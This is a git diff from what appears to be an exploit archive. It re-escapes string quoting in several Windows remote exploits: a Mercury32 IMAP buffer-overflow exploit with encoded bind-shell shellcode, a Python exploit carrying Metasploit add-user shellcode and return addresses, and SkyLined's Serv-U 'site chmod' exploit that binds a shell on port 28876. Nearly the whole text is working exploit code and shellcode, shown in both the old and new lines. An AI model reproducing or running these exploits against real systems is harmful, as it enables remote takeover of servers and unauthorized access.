@@ -188,30 +188,30 @@ int     SendExploit()
     s = socket(AF_INET, SOCK_STREAM, 0);
     if (s < 0)
     {
-        perror("socket");
+        perror(\"socket\");
         return(0);
     }
     if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
 
     {
-        perror("connect");
+        perror(\"connect\");
         return(0);
     }
-    printf("[+] connect to %s:%d success.\n", ip, iPort);
+    printf(\"[+] connect to %s:%d success.\\n\", ip, iPort);
     sleep(3);
 
     memset(szRecvBuff, 0, sizeof(szRecvBuff));
     iErr = send(s, buffer2, strlen(buffer2),0);
-    printf("[+] Sent: %d\n", iErr);
+    printf(\"[+] Sent: %d\\n\", iErr);
 
     iErr = send(s, buffer, x,0);
 
-    printf("[+] Sent: %d\n", iErr);
+    printf(\"[+] Sent: %d\\n\", iErr);
 
-    printf("[+] Wait for shell.\n");
+    printf(\"[+] Wait for shell.\\n\");
     if (!(he = gethostbyname(ip)))
     {
-        herror("Resolving host");
+        herror(\"Resolving host\");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -224,16 +224,16 @@ int     SendExploit()
     s2 = socket(AF_INET, SOCK_STREAM, 0);
     if (s2 < 0)
     {
-        perror("socket");
+        perror(\"socket\");
         exit(EXIT_FAILURE);
     }
 
     if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
     {
-        perror("connect");
+        perror(\"connect\");
         return(0);
     }
-    printf ("[+] We got a shell \n");
+    printf (\"[+] We got a shell \\n\");
 
     shell(s2);
 
@@ -244,9 +244,9 @@ int     SendExploit()
 
 int usage(char *p)
 {
-    printf("MERCURY32 Imap Remote Exploit\n");
-    printf("By: JohnH@secnetops.com\n");
-    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port>\n",p);
+    printf(\"MERCURY32 Imap Remote Exploit\\n\");
+    printf(\"By: JohnH@secnetops.com\\n\");
+    printf( \"Usage: %s <-u username> <-p password> <-h host> <-p port>\\n\",p);
     exit(0);
 }
 
diff --git a/platforms/windows/remote/670.c b/platforms/windows/remote/670.c
index e046dd9f4..77fdf18ff 100755
--- a/platforms/windows/remote/670.c
+++ b/platforms/windows/remote/670.c
@@ -24,35 +24,35 @@
 #include <fcntl.h>
 #include <sys/time.h>
 
-#define version         "1.0"
+#define version         \"1.0\"
 int usage(char *p);
 
 
 char sc_bind[] =
     //decoder
-    "\xEB\x0F\x5B\x80\x33\x96\x43\x81\x3B\x45\x59\x34\x53\x75\xF4\x74"
-    "\x05\xE8\xEC\xFF\xFF\xFF"
+    \"\\xEB\\x0F\\x5B\\x80\\x33\\x96\\x43\\x81\\x3B\\x45\\x59\\x34\\x53\\x75\\xF4\\x74\"
+    \"\\x05\\xE8\\xEC\\xFF\\xFF\\xFF\"
     //sc_bind_1981 for 2k/xp/2003 v1.03.10.09 by ey4s
     //XOR with 0x96 (267 0x10B bytes)
-    "\x7E\xB2\x96\x96\x96\x22\xEB\x83\x0E\x5D\xD4\xE1\x2E\x4A\x4B\x8C"
-    "\xA5\x7F\x2D\x55\x38\x50\xBD\x2B\xB8\x48\xC1\xE4\x32\xB2\x24\xA4"
-    "\x96\x98\xCB\x5D\x48\xE2\xB4\xF5\x5E\xC9\xFC\xA6\xCD\xF2\x1D\x95"
-    "\x1D\xD6\x9A\x1D\xE6\x8A\x3B\x1D\xFE\x9E\xFC\x92\xCF\x7E\x12\x96"
-    "\x96\x96\x74\x6F\x23\x95\xBD\x77\xFE\xA5\xA4\x96\x96\xFE\xE1\xE5"
-    "\xA4\xC9\xC2\x69\xC1\x6E\x03\xFC\x93\xCF\x7E\xF1\x96\x96\x96\x74"
-    "\x6F\x1D\x61\xC7\xFE\x94\x96\x91\x2B\x1D\x7A\xC7\xC7\xC7\xC7\xFC"
-    "\x97\xFC\x94\x69\xC0\x66\x05\xFC\x86\xC3\xC5\x69\xC0\x62\xC6\xC5"
-    "\x69\xC0\x6E\x1D\x6A\xFC\x98\xCF\x3D\x74\x6B\xC6\xC6\xC5\x69\xC0"
-    "\x6A\x3D\x3D\x3D\xF0\x51\xD2\xB2\xBA\x97\x97\x1D\x42\xFE\xF5\xFB"
-    "\xF2\x96\x1D\x5A\xC5\xC6\xC1\xC4\xA5\x4D\xC5\xC5\xC5\xFC\x97\xC5"
-    "\xC5\xC7\xC5\x69\xC0\x76\xFC\x69\x69\xA1\x69\xC0\x4A\x69\xC0\x7A"
-    "\x69\xC0\x7A\x69\xC0\x7E\xC7\x1D\xE3\xAA\x1D\xE2\xB8\xEE\x95\x63"
-    "\xC0\x1D\xE0\xB6\x95\x63\xA5\x5F\xDF\xD7\x3B\x95\x53\xA5\x4D\xA5"
-    "\x44\x99\x28\x86\xAC\x40\xE2\x9E\x57\x5D\x8D\x95\x4C\xD6\x7D\x79"
-    "\xAD\x89\xE3\x73\xC8\x1D\xC8\xB2\x95\x4B\xF0\x1D\x9A\xDD\x1D\xC8"
-    "\x8A\x95\x4B\x1D\x92\x1D\x95\x53\x3D\xCF\x55"
+    \"\\x7E\\xB2\\x96\\x96\\x96\\x22\\xEB\\x83\\x0E\\x5D\\xD4\\xE1\\x2E\\x4A\\x4B\\x8C\"
+    \"\\xA5\\x7F\\x2D\\x55\\x38\\x50\\xBD\\x2B\\xB8\\x48\\xC1\\xE4\\x32\\xB2\\x24\\xA4\"
+    \"\\x96\\x98\\xCB\\x5D\\x48\\xE2\\xB4\\xF5\\x5E\\xC9\\xFC\\xA6\\xCD\\xF2\\x1D\\x95\"
+    \"\\x1D\\xD6\\x9A\\x1D\\xE6\\x8A\\x3B\\x1D\\xFE\\x9E\\xFC\\x92\\xCF\\x7E\\x12\\x96\"
+    \"\\x96\\x96\\x74\\x6F\\x23\\x95\\xBD\\x77\\xFE\\xA5\\xA4\\x96\\x96\\xFE\\xE1\\xE5\"
+    \"\\xA4\\xC9\\xC2\\x69\\xC1\\x6E\\x03\\xFC\\x93\\xCF\\x7E\\xF1\\x96\\x96\\x96\\x74\"
+    \"\\x6F\\x1D\\x61\\xC7\\xFE\\x94\\x96\\x91\\x2B\\x1D\\x7A\\xC7\\xC7\\xC7\\xC7\\xFC\"
+    \"\\x97\\xFC\\x94\\x69\\xC0\\x66\\x05\\xFC\\x86\\xC3\\xC5\\x69\\xC0\\x62\\xC6\\xC5\"
+    \"\\x69\\xC0\\x6E\\x1D\\x6A\\xFC\\x98\\xCF\\x3D\\x74\\x6B\\xC6\\xC6\\xC5\\x69\\xC0\"
+    \"\\x6A\\x3D\\x3D\\x3D\\xF0\\x51\\xD2\\xB2\\xBA\\x97\\x97\\x1D\\x42\\xFE\\xF5\\xFB\"
+    \"\\xF2\\x96\\x1D\\x5A\\xC5\\xC6\\xC1\\xC4\\xA5\\x4D\\xC5\\xC5\\xC5\\xFC\\x97\\xC5\"
+    \"\\xC5\\xC7\\xC5\\x69\\xC0\\x76\\xFC\\x69\\x69\\xA1\\x69\\xC0\\x4A\\x69\\xC0\\x7A\"
+    \"\\x69\\xC0\\x7A\\x69\\xC0\\x7E\\xC7\\x1D\\xE3\\xAA\\x1D\\xE2\\xB8\\xEE\\x95\\x63\"
+    \"\\xC0\\x1D\\xE0\\xB6\\x95\\x63\\xA5\\x5F\\xDF\\xD7\\x3B\\x95\\x53\\xA5\\x4D\\xA5\"
+    \"\\x44\\x99\\x28\\x86\\xAC\\x40\\xE2\\x9E\\x57\\x5D\\x8D\\x95\\x4C\\xD6\\x7D\\x79\"
+    \"\\xAD\\x89\\xE3\\x73\\xC8\\x1D\\xC8\\xB2\\x95\\x4B\\xF0\\x1D\\x9A\\xDD\\x1D\\xC8\"
+    \"\\x8A\\x95\\x4B\\x1D\\x92\\x1D\\x95\\x53\\x3D\\xCF\\x55\"
     //decoder end sign
-    "\x45\x59\x34\x53";
+    \"\\x45\\x59\\x34\\x53\";
 
 int             type;
 int             iPort=143;
@@ -72,24 +72,24 @@ int main(int argc, char **argv)
     }
 
 
-    while((c = getopt(argc, argv, "u:P:h:p:t:")) != EOF) {
+    while((c = getopt(argc, argv, \"u:P:h:p:t:\")) != EOF) {
         switch(c) {
 
-        case 'u':
+        case \'u\':
             strncpy(username, optarg, sizeof (username) - 1);
             break;
 
-        case 'P':
+        case \'P\':
             strncpy(password, optarg, sizeof (password) - 1);
             break;
 
-        case 'h':
+        case \'h\':
             ip=optarg;
             break;
-        case 'p':
+        case \'p\':
             iPort=atoi(optarg);
             break;
-        case 't':
+        case \'t\':
 	    type=atoi(optarg);
 	    break;
 	default:
@@ -102,7 +102,7 @@ int main(int argc, char **argv)
     if((!ip))
     {
         usage(argv[0]);
-        printf("[-] Invalid parameter.\n");
+        printf(\"[-] Invalid parameter.\\n\");
         return 0;
     }
 
@@ -125,7 +125,7 @@ void shell (int sock)
         if (FD_ISSET (0, &rfds)) {
             l = read (0, buf, sizeof (buf));
             if (l <= 0) {
-                printf("\n - Connection closed by local user\n");
+                printf(\"\\n - Connection closed by local user\\n\");
                 exit (EXIT_FAILURE);
             }
             write (sock, buf, l);
@@ -134,10 +134,10 @@ void shell (int sock)
         if (FD_ISSET (sock, &rfds)) {
             l = read (sock, buf, sizeof (buf));
             if (l == 0) {
-                printf ("\n - Connection closed by remote host.\n");
+                printf (\"\\n - Connection closed by remote host.\\n\");
                 exit (EXIT_FAILURE);
             } else if (l < 0) {
-                printf ("\n - Read failure\n");
+                printf (\"\\n - Read failure\\n\");
                 exit (EXIT_FAILURE);
             }
             write (1, buf, l);
@@ -157,50 +157,50 @@ int     SendExploit()
     char    szRecvBuff[0x1000];
     char *ip2=NULL;
 
-    printf( "MERCURY32 Imap exploit\n");
-    printf( "By: JohnH@secnetops.com\n");
-    printf("[+] Entering God Mode\n");
+    printf( \"MERCURY32 Imap exploit\\n\");
+    printf( \"By: JohnH@secnetops.com\\n\");
+    printf(\"[+] Entering God Mode\\n\");
 
     // Login
     memset(buffer2,0x0,sizeof(buffer2));
-    strcat(buffer2,"a001 LOGIN ");
+    strcat(buffer2,\"a001 LOGIN \");
     strcat(buffer2,username);
-    strcat(buffer2," ");
+    strcat(buffer2,\" \");
     strcat(buffer2,password);
-    strcat(buffer2,"\n");
+    strcat(buffer2,\"\\n\");
 
     bzero  (buffer,sizeof(buffer));
-    printf("[+] Using type: %d\n",type);
+    printf(\"[+] Using type: %d\\n\",type);
     if (type == 0)
-          strcat(buffer,"a001 EXAMINE ");
+          strcat(buffer,\"a001 EXAMINE \");
     else if(type == 1)
-	   strcat(buffer,"a001 SUBSCRIBE ");
+	   strcat(buffer,\"a001 SUBSCRIBE \");
     else if(type == 2)
-	   strcat(buffer,"a001 STATUS ");
+	   strcat(buffer,\"a001 STATUS \");
     else if(type == 3)
-            strcat(buffer,"a001 APPEND ");
+            strcat(buffer,\"a001 APPEND \");
     else if(type == 4)
-            strcat(buffer,"a001 CHECK ");
+            strcat(buffer,\"a001 CHECK \");
     else if(type == 5)
-            strcat(buffer,"a001 CLOSE ");
+            strcat(buffer,\"a001 CLOSE \");
     else if(type == 6)
-            strcat(buffer,"a001 EXPUNGE ");
+            strcat(buffer,\"a001 EXPUNGE \");
     else if(type == 7)
-            strcat(buffer,"a001 FETCH ");
+            strcat(buffer,\"a001 FETCH \");
     else if(type == 8)
-            strcat(buffer,"a001 RENAME ");
+            strcat(buffer,\"a001 RENAME \");
     else if(type == 9)
-            strcat(buffer,"a001 DELETE ");
+            strcat(buffer,\"a001 DELETE \");
     else if(type == 10)
-            strcat(buffer,"a001 LIST ");
+            strcat(buffer,\"a001 LIST \");
     else if(type == 11)
-            strcat(buffer,"a001 SEARCH ");
+            strcat(buffer,\"a001 SEARCH \");
     else if(type == 12)
-	    strcat(buffer,"a001 CREATE ");
+	    strcat(buffer,\"a001 CREATE \");
     else if(type == 13)
-            strcat(buffer,"a001 UNSUBSCRIBE ");
+            strcat(buffer,\"a001 UNSUBSCRIBE \");
     else if(type == 14)
-	    strcat(buffer,"a001 SELECT ");
+	    strcat(buffer,\"a001 SELECT \");
 
 
 
@@ -213,13 +213,13 @@ int     SendExploit()
     x+=100;
     memcpy (buffer+x, sc_bind, strlen(sc_bind));
     x+=strlen(sc_bind);
-    memcpy(buffer+x,"\r\n",2);
+    memcpy(buffer+x,\"\\r\\n\",2);
     x+=2;
 
 
     if (!(he = gethostbyname(ip)))
     {
-        herror("Resolving host");
+        herror(\"Resolving host\");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -229,30 +229,30 @@ int     SendExploit()
     s = socket(AF_INET, SOCK_STREAM, 0);
     if (s < 0)
     {
-        perror("socket");
+        perror(\"socket\");
         return(0);
     }
     if (connect(s, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
 
     {
-        perror("connect");
+        perror(\"connect\");
         return(0);
     }
-    printf("[+] connect to %s:%d success.\n", ip, iPort);
+    printf(\"[+] connect to %s:%d success.\\n\", ip, iPort);
     sleep(3);
 
     memset(szRecvBuff, 0, sizeof(szRecvBuff));
     iErr = send(s, buffer2, strlen(buffer2),0);
-    printf("[+] Sent: %d\n", iErr);
+    printf(\"[+] Sent: %d\\n\", iErr);
 
     iErr = send(s, buffer, x,0);
 
-    printf("[+] Sent: %d\n", iErr);
+    printf(\"[+] Sent: %d\\n\", iErr);
 
-    printf("[+] Wait for shell.\n");
+    printf(\"[+] Wait for shell.\\n\");
     if (!(he = gethostbyname(ip)))
     {
-        herror("Resolving host");
+        herror(\"Resolving host\");
         exit(EXIT_FAILURE);
     }
     in.s_addr = *((unsigned int *)he->h_addr);
@@ -265,16 +265,16 @@ int     SendExploit()
     s2 = socket(AF_INET, SOCK_STREAM, 0);
     if (s2 < 0)
     {
-        perror("socket");
+        perror(\"socket\");
         exit(EXIT_FAILURE);
     }
 
     if (connect(s2, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0)
     {
-        perror("connect");
+        perror(\"connect\");
         return(0);
     }
-    printf ("[+] We got a shell \n");
+    printf (\"[+] We got a shell \\n\");
 
     shell(s2);
 
@@ -285,10 +285,10 @@ int     SendExploit()
 
 int usage(char *p)
 {
-    printf("MERCURY32 Imap Remote Exploit\n");
-    printf("By: JohnH@secnetops.com\n");
-    printf( "Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\n",p);
-    printf("Possible types: Look in source code too lazy to type out 14 types\n");
+    printf(\"MERCURY32 Imap Remote Exploit\\n\");
+    printf(\"By: JohnH@secnetops.com\\n\");
+    printf( \"Usage: %s <-u username> <-p password> <-h host> <-p port> <-t type>\\n\",p);
+    printf(\"Possible types: Look in source code too lazy to type out 14 types\\n\");
     exit(0);
 }
 
diff --git a/platforms/windows/remote/819.py b/platforms/windows/remote/819.py
index 8f6cbead9..4abf7df37 100755
--- a/platforms/windows/remote/819.py
+++ b/platforms/windows/remote/819.py
@@ -9,38 +9,38 @@
 #########################################################
 import struct
 import socket
-sc = "\x90" * 21	#We need this number of nops
+sc = \"\\x90\" * 21	#We need this number of nops
 # win32_adduser - PASS=pwd EXITFUNC=thread USER=X Size=232 Encoder=PexFnstenvSub http://metasploit.com
-sc += "\x31\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
-sc += "\x23\x73\xe4\x83\xeb\xfc\xe2\xf4\x24\xcb\x35\xe4\xd8\x23\xf8\xa1"
-sc += "\xe4\xa8\x0f\xe1\xa0\x22\x9c\x6f\x97\x3b\xf8\xbb\xf8\x22\x98\x07"
-sc += "\xf6\x6a\xf8\xd0\x53\x22\x9d\xd5\x18\xba\xdf\x60\x18\x57\x74\x25"
-sc += "\x12\x2e\x72\x26\x33\xd7\x48\xb0\xfc\x27\x06\x07\x53\x7c\x57\xe5"
-sc += "\x33\x45\xf8\xe8\x93\xa8\x2c\xf8\xd9\xc8\xf8\xf8\x53\x22\x98\x6d"
-sc += "\x84\x07\x77\x27\xe9\xe3\x17\x6f\x98\x13\xf6\x24\xa0\x2c\xf8\xa4"
-sc += "\xd4\xa8\x03\xf8\x75\xa8\x1b\xec\x31\x28\x73\xe4\xd8\xa8\x33\xd0"
-sc += "\xdd\x5f\x73\xe4\xd8\xa8\x1b\xd8\x87\x12\x85\x84\x8e\xc8\x7e\x8c"
-sc += "\x37\xed\x93\x84\xb0\xbb\x8d\x6e\xd6\x74\x8c\x03\x30\xcd\x8c\x1b"
-sc += "\x27\x40\x1e\x80\xf6\x46\x0b\x81\xf8\x0c\x10\xc4\xb6\x46\x07\xc4"
-sc += "\xad\x50\x16\x96\xf8\x7b\x53\x94\xaf\x47\x53\xcb\x99\x67\x37\xc4"
-sc += "\xfe\x05\x53\x8a\xbd\x57\x53\x88\xb7\x40\x12\x88\xbf\x51\x1c\x91"
-sc += "\xa8\x03\x32\x80\xb5\x4a\x1d\x8d\xab\x57\x01\x85\xac\x4c\x01\x97"
-sc += "\xf8\x7b\x53\xcb\x99\x67\x37\xe4";
-sc += "AA"
+sc += \"\\x31\\xc9\\x83\\xe9\\xcc\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\"
+sc += \"\\x23\\x73\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xcb\\x35\\xe4\\xd8\\x23\\xf8\\xa1\"
+sc += \"\\xe4\\xa8\\x0f\\xe1\\xa0\\x22\\x9c\\x6f\\x97\\x3b\\xf8\\xbb\\xf8\\x22\\x98\\x07\"
+sc += \"\\xf6\\x6a\\xf8\\xd0\\x53\\x22\\x9d\\xd5\\x18\\xba\\xdf\\x60\\x18\\x57\\x74\\x25\"
+sc += \"\\x12\\x2e\\x72\\x26\\x33\\xd7\\x48\\xb0\\xfc\\x27\\x06\\x07\\x53\\x7c\\x57\\xe5\"
+sc += \"\\x33\\x45\\xf8\\xe8\\x93\\xa8\\x2c\\xf8\\xd9\\xc8\\xf8\\xf8\\x53\\x22\\x98\\x6d\"
+sc += \"\\x84\\x07\\x77\\x27\\xe9\\xe3\\x17\\x6f\\x98\\x13\\xf6\\x24\\xa0\\x2c\\xf8\\xa4\"
+sc += \"\\xd4\\xa8\\x03\\xf8\\x75\\xa8\\x1b\\xec\\x31\\x28\\x73\\xe4\\xd8\\xa8\\x33\\xd0\"
+sc += \"\\xdd\\x5f\\x73\\xe4\\xd8\\xa8\\x1b\\xd8\\x87\\x12\\x85\\x84\\x8e\\xc8\\x7e\\x8c\"
+sc += \"\\x37\\xed\\x93\\x84\\xb0\\xbb\\x8d\\x6e\\xd6\\x74\\x8c\\x03\\x30\\xcd\\x8c\\x1b\"
+sc += \"\\x27\\x40\\x1e\\x80\\xf6\\x46\\x0b\\x81\\xf8\\x0c\\x10\\xc4\\xb6\\x46\\x07\\xc4\"
+sc += \"\\xad\\x50\\x16\\x96\\xf8\\x7b\\x53\\x94\\xaf\\x47\\x53\\xcb\\x99\\x67\\x37\\xc4\"
+sc += \"\\xfe\\x05\\x53\\x8a\\xbd\\x57\\x53\\x88\\xb7\\x40\\x12\\x88\\xbf\\x51\\x1c\\x91\"
+sc += \"\\xa8\\x03\\x32\\x80\\xb5\\x4a\\x1d\\x8d\\xab\\x57\\x01\\x85\\xac\\x4c\\x01\\x97\"
+sc += \"\\xf8\\x7b\\x53\\xcb\\x99\\x67\\x37\\xe4\";
+sc += \"AA\"
 # Win2k SP0,1,2,3,4 (US...)
 #Change Return address as needed
-#buf = "\xEB\x19" + " /" + sc + struct.pack("<L",0x750236b2) + "\r\n\r\n"
+#buf = \"\\xEB\\x19\" + \" /\" + sc + struct.pack(\"<L\",0x750236b2) + \"\\r\\n\\r\\n\"
 
 #0x74FA2AC4		pop esi - pop - ret	ws2help.dll	Win 2K SP4 FR (Found with findjmp2 by Class101 ;)
-#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x74fa2ac5) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops
+#buf = \"\\x90\" * 24 + \" /\" + sc + struct.pack(\"<L\",0x74fa2ac5) + \"\\r\\n\\r\\n\"	#EB becomes CB...? so i changed it by nops
 
 #Win XP SP2 FR?
 #0x719E260D		pop esi - pop - ret	ws2help.dll	Win XP SP2 FR (Found with findjmp2 by Class101 ;)
-#buf = "\x90" * 24 + " /" + sc + struct.pack("<L",0x719e260e) + "\r\n\r\n"	#EB becomes CB...? so i changed it by nops
+#buf = \"\\x90\" * 24 + \" /\" + sc + struct.pack(\"<L\",0x719e260e) + \"\\r\\n\\r\\n\"	#EB becomes CB...? so i changed it by nops
 
 
 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
-s.connect(('127.0.0.1',80))
+s.connect((\'127.0.0.1\',80))
 s.send(buf)
 s.close()
 
diff --git a/platforms/windows/remote/822.c b/platforms/windows/remote/822.c
index e13e7bc02..86fcb28ab 100755
--- a/platforms/windows/remote/822.c
+++ b/platforms/windows/remote/822.c
@@ -4,36 +4,36 @@
 #include <netinet/in.h>
 
 #define exploit_length      511
-#define NOP 'A'
+#define NOP \'A\'
 
 #define SEH_handler_offset  400
-char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
-char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
-char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
-char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b
+char* SEH_handler     = \"\\x41\\x41\\xEB\\x04\"; // 3) jmp over next four bytes
+char* retaddress_4004 = \"\\xab\\x1c\\x5f\\x01\"; // 1) libeay32.015f1cab
+char* retaddress_4100 = \"\\xcb\\x1c\\x41\\x01\"; // 1) ssleay32.01411ccb
+char* retaddress_4103 = \"\\x8b\\x1d\\x41\\x01\"; // 1) ssleay32.01411d8b
 
 char* shellcode = 
-  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
-  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
-  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
-  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
-  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
-  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
-  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
-  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
-  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
-  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
-  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
-  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
-  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
-  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
-  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
-  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
-  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
-  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
-  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
-  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
-  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";
+  \"\\xeb\\x43\\x56\\x57\\x8b\\x45\\x3c\\x8b\\x54\\x05\\x78\\x01\\xea\\x52\\x8b\\x52\"
+  \"\\x20\\x01\\xea\\x31\\xc0\\x31\\xc9\\x41\\x8b\\x34\\x8a\\x01\\xee\\x31\\xff\\xc1\"
+  \"\\xcf\\x13\\xac\\x01\\xc7\\x85\\xc0\\x75\\xf6\\x39\\xdf\\x75\\xea\\x5a\\x8b\\x5a\"
+  \"\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\"
+  \"\\xe8\\x5f\\x5e\\xff\\xe0\\xfc\\x31\\xc0\\x64\\x8b\\x40\\x30\\x8b\\x40\\x0c\\x8b\"
+  \"\\x70\\x1c\\xad\\x8b\\x68\\x08\\x31\\xc0\\x66\\xb8\\x6c\\x6c\\x50\\x68\\x33\\x32\"
+  \"\\x2e\\x64\\x68\\x77\\x73\\x32\\x5f\\x54\\xbb\\x71\\xa7\\xe8\\xfe\\xe8\\x90\\xff\"
+  \"\\xff\\xff\\x89\\xef\\x89\\xc5\\x81\\xc4\\x70\\xfe\\xff\\xff\\x54\\x31\\xc0\\xfe\"
+  \"\\xc4\\x40\\x50\\xbb\\x22\\x7d\\xab\\x7d\\xe8\\x75\\xff\\xff\\xff\\x31\\xc0\\x50\"
+  \"\\x50\\x50\\x50\\x40\\x50\\x40\\x50\\xbb\\xa6\\x55\\x34\\x79\\xe8\\x61\\xff\\xff\"
+  \"\\xff\\x89\\xc6\\x31\\xc0\\x50\\x50\\x35\\x02\\x01\\x70\\xcc\\xfe\\xcc\\x50\\x89\"
+  \"\\xe0\\x50\\x6a\\x10\\x50\\x56\\xbb\\x81\\xb4\\x2c\\xbe\\xe8\\x42\\xff\\xff\\xff\"
+  \"\\x31\\xc0\\x50\\x56\\xbb\\xd3\\xfa\\x58\\x9b\\xe8\\x34\\xff\\xff\\xff\\x58\\x6a\"
+  \"\\x10\\x54\\x50\\x56\\xbb\\x47\\xf3\\x56\\xc6\\xe8\\x24\\xff\\xff\\xff\\x31\\xdb\"
+  \"\\x53\\x68\\x2e\\x63\\x6d\\x64\\x89\\xe1\\x41\\x50\\x50\\x50\\x53\\x53\\x31\\xc0\"
+  \"\\xfe\\xc4\\x40\\x50\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x53\\x6a\\x44\"
+  \"\\x89\\xe6\\x50\\x55\\x53\\x53\\x53\\x53\\x54\\x56\\x53\\x53\\x53\\x43\\x53\\x4b\"
+  \"\\x53\\x53\\x51\\x53\\x89\\xfd\\xbb\\x21\\xd0\\x05\\xd0\\xe8\\xe2\\xfe\\xff\\xff\"
+  \"\\x31\\xc0\\x48\\x8b\\x44\\x24\\x04\\xbb\\x43\\xcb\\x8d\\x5f\\xe8\\xd1\\xfe\\xff\"
+  \"\\xff\\x5d\\x5d\\x5d\\xbb\\x12\\x6b\\x6d\\xd0\\xe8\\xc4\\xfe\\xff\\xff\\x31\\xc0\"
+  \"\\x50\\x89\\xfd\\xbb\\x69\\x1d\\x42\\x3a\\xe8\\xb5\\xfe\\xff\\xff\";
 
 int sock;
 FILE* FILEsock;
@@ -42,12 +42,12 @@ int doubling;
 void send_command(char *command, char *arguments) {
   int i;
   send(sock, command, strlen(command), 0);
-  send(sock, " ", 1, 0);
+  send(sock, \" \", 1, 0);
   for (i=0; i<strlen(arguments); i++) {
     send(sock, arguments+i, 1, 0);
-    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
+    if (doubling && arguments[i] == \'\\xff\') send(sock, arguments+i, 1, 0);
   }
-  send(sock, "\x0a\x0d", 2, 0);
+  send(sock, \"\\x0a\\x0d\", 2, 0);
 }
 
 int main(int argc, char *argv[], char *envp[]) {
@@ -57,93 +57,93 @@ int main(int argc, char *argv[], char *envp[]) {
   char *version = NULL;
 
   if (argc<5) {
-    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
+    printf(\"Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\\n\", argv[0]);
     exit(-1);
   }
 
-  printf("- Serv-ME ----------------------------------------------------\n"
-         "  Serv-U v4.x \"site chmod\" exploit.\n"
-         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
-         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
-         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
-         "  Greets to everyone at 0dd and #netric.\n"
-         "  (K)(L)(F) for Suzan.\n"
-         "\n"
-         "  Binds a shell at %s:28876 if successfull.\n"
-         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
-         "--------------------------------------------------------------\n",
+  printf(\"- Serv-ME ----------------------------------------------------\\n\"
+         \"  Serv-U v4.x \\\"site chmod\\\" exploit.\\n\"
+         \"  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\\n\"
+         \"  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\\n\"
+         \"  Thanks to H D Moore for the shellcode (www.metasploit.com).\\n\"
+         \"  Greets to everyone at 0dd and #netric.\\n\"
+         \"  (K)(L)(F) for Suzan.\\n\"
+         \"\\n\"
+         \"  Binds a shell at %s:28876 if successfull.\\n\"
+         \"  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\\n\"
+         \"--------------------------------------------------------------\\n\",
            argv[1]);
 
   addr.sin_family = AF_INET;
